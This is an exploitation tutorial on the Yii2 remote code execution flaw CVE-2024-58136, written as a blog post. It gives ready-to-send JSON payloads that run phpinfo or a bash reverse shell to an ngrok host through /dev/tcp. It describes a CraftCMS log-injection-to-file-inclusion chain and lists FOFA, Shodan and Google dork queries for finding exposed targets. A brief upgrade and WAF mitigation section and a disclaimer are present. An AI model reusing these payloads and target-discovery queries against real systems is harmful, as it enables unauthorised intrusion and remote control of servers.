CVE-2024–58136 is a critical remote code execution (RCE) vulnerability in the Yii2 PHP framework. It affects applications that allow behaviors to be attached to components using a JSON object that contains the __class parameter. The flaw lies in the improper validation of the __class key, allowing attackers to instantiate arbitrary PHP classes with controlled parameters — leading to RCE.

⚠️ For education purpose only! Use this vulnerability ethically and report findings through responsible disclosure channels or bug bounty platforms.

This article demonstrates how to discover this vulnerability in real-world applications using and explains how to get the Recevese Shell & mitigation.

We’ll also explore how the vulnerability works, walk through the exploitation chain (including authenticated CraftCMS LFI-to-RCE), and offer recommendations for detection and prevention.

Yii2 allows developers to attach behaviors to components dynamically using the as <name> syntax. When behaviors are defined using a JSON object (especially when yii\web\JsonParser is enabled), an attacker can supply the following structure:

Ref: https://attackerkb.com/topics/U2DdokjYhB/cve-2024-58136/rapid7-analysis

{
  "as hack": {
    "__class": "ArbitraryClass",
    "class": "ValidBehavior",
    "payload": "..."
  }
}

In vulnerable versions (prior to 2.0.52), Yii checks only the class key for subclassing yii\base\Behavior, but still instantiates whatever is in __class. This enables gadget-based RCE using destructors or controlled constructor arguments.

When parsed and destructed by Yii2, this causes phpinfo() to execute.

1. FOFA Queries

title="yii" || header="X-Powered-By: Yii"

Refine by country or port if needed:

title="yii" || header="X-Powered-By: Yii" && port=xxx && country="XX"

2. Shodan Queries

Use this in Shodan:

http.headers:"X-Powered-By: Yii"

To narrow results:

http.favicon.hash:<known-hash-of-yii>

3. Google Dorks

intext:"powered by Yii Framework" inurl:/index.php
intext:"CraftSessionId"
"powered by Yii Framework" intitle:index.of

Step 1: phpinfo() Test for Confirmed RCE

url -k -X POST https://target/index.php \
  -H "Content-Type: application/json" \
  -d '{"as hack": {"__class": "GuzzleHttp\\\\Psr7\\\\FnStream", "class": "yii\\\\behaviors\\\\AttributeBehavior", "__construct()": [[]], "_fn_close": "phpinfo"}}'

Check if response includes phpinfo(), PHP Version, etc.

Step 2: Reverse Shell Payload

Setup and listener

nc -lvnp 9988

curl -k -X POST https://sub.domain.tld/index.php \
  -H "Content-Type: application/json" \
  -d '{"as hack": {"__class": "GuzzleHttp\\\\Psr7\\\\FnStream", "class": "yii\\\\behaviors\\\\AttributeBehavior", "__construct()": [[]], "_fn_close": "system", "stream": "bash -c '\''bash -i >& /dev/tcp/x.tcp.xx.ngrok.io/xxxx 0>&1'\''"}}'

1. FOFA Queries

body="Craft CMS" || header="Set-Cookie: CraftSessionId=" || header="X-Powered-By: Yii"

Refine by country or port if needed:

body="Craft CMS" && port=443 && country="US"

2. Shodan Queries

Use this in Shodan:

http.html:"Craft CMS" OR http.headers:"X-Powered-By: Yii"

To narrow results:

http.favicon.hash:<known-hash-of-craftcms>

3. Google Dorks

title:"Craft CMS" inurl:/index.php
intext:"CraftSessionId"
"powered by Yii Framework" intitle:index.of

Advanced Exploitation in CraftCMS

When CraftCMS is running on top of Yii2 (vulnerable version), and CSRF tokens are required, we chain the exploit:

Step 1: Log Injection

Use a reverse shell payload encoded and injected via Cookie or error page. Payload is logged.

Step 2: Trigger Log-Based LFI using PhpManager

{
  "as hack": {
    "__class": "yii\\rbac\\PhpManager",
    "class": "yii\\behaviors\\AttributeBehavior",
    "itemFile": "/tmp/runtime/logs/app.log"
  }
}

This includes the PHP code written to the log and executes it — resulting in RCE.

Mitigation

• Upgrade Yii2 to 2.0.52 or later
• Add server-side WAF to block behavior keys like __class, as, on
• Avoid accepting raw JSON from untrusted clients

Conclusion

CVE-2024–58136 is an elegant yet dangerous logic flaw in how Yii2 handles dynamic behavior attachment. When paired with gadgets like FnStream or PhpManager, it leads to unauthenticated RCE or SSRF. Using FOFA, Shodan, and dorks, you can identify potentially thousands of vulnerable assets in the wild — but only a few will be exploitable due to CSRF/auth/ZGAFs.